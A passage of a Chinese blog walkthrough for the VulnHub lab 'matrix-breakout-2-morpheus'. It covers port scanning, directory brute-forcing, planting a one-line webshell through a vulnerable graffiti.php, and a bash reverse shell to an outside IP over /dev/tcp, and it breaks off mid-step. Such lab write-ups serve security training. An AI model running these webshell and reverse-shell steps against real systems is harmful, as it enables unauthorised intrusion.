当前位置: 首页 > news >正文

matrix-breakout-2-morpheus靶场通过

1、安装靶场

下载虚拟机(https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova)。

2、主机ip和端口

用nmap扫描一下ip和端口,主机ip是192.168.13.1,那我们靶场的ip就是192.168.13.144,并且22,80,81端口是开发的。

依次访问端口,发现81端口弹出一个登录框。

3、目录扫描

dirsearch -u 192.168.13.144  //在kali里用

可以发现有一个robots.txt。访问robots.txt,提示我们继续找找。可能是因为我们的字典太小了,我们找找有没有更大的字典。

gobuster dir -u http://192.168.13.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

通过gobuster扫描了一个几十万的字典,我们可以看到有一个graffiti.php,尝试访问。

4、抓包

随便输入一个数据,我们可以发现数据被传输到了graffiti.txt。

5、Getshell

抓包写一句话木马进去,用工具连接木马。

6、反弹shell

bash -i >& /dev/tcp/47.93.51.60/8888 0>&1

在目录里新建一个shell.sh,里面写我们的反弹shell,然后

http://www.lryc.cn/news/598335.html

相关文章:

  • 基于深度学习的胸部 X 光图像肺炎分类系统(二)
  • 小架构step系列24:功能模块
  • Android中compileSdk,minSdk,targetSdk的含义和区别
  • M3295NL专为千兆以太网设计,支持100/1000Mbps全双工通信M3295支持4对5类UTP电缆
  • SparkSQL 子查询 IN/NOT IN 对 NULL 值的处理
  • 数据结构 堆(3)---堆排序
  • 在 Windows 上安装设置 MongoDB及常见问题
  • 多源信息融合智能投资【“图神经网络+强化学习“的融合架构】【低配显卡正常运行】
  • 如何清理电脑c盘内存 详细操作步骤
  • dify 变量聚合器-聚合分组问题
  • 【Java工程师面试全攻略】Day12:系统安全与高可用设计
  • 再生基因总结
  • 腾势N9再进化:智能加buff,豪华更对味
  • Dataease2.10 前端二次开发
  • Java 实现 C/S 架构详解:从基础到实战,彻底掌握客户端/服务端编程
  • 机器学习的基础知识
  • LeetCode 2563.统计公平数对的数目
  • AI时代,我的编程工作搭子
  • Windows 主机侧日志排查
  • CentOS7 安装 rust 1.82.0
  • 小模数齿轮的加工方法有哪些?
  • 医疗系统国产化实录:SQL Server国产替代,乙方保命指南
  • MySQL 表的操作
  • 【Haproxy】七层代理
  • 详解力扣高频SQL50题之1683. 无效的推文【入门】
  • MySQL深度理解-MySQL事务优化
  • SQL173 店铺901国庆期间的7日动销率和滞销率
  • 详解力扣高频SQL50题之197. 上升的温度【简单】
  • 【MySQL】MySQL 事务和锁详解
  • Redis--哨兵机制详解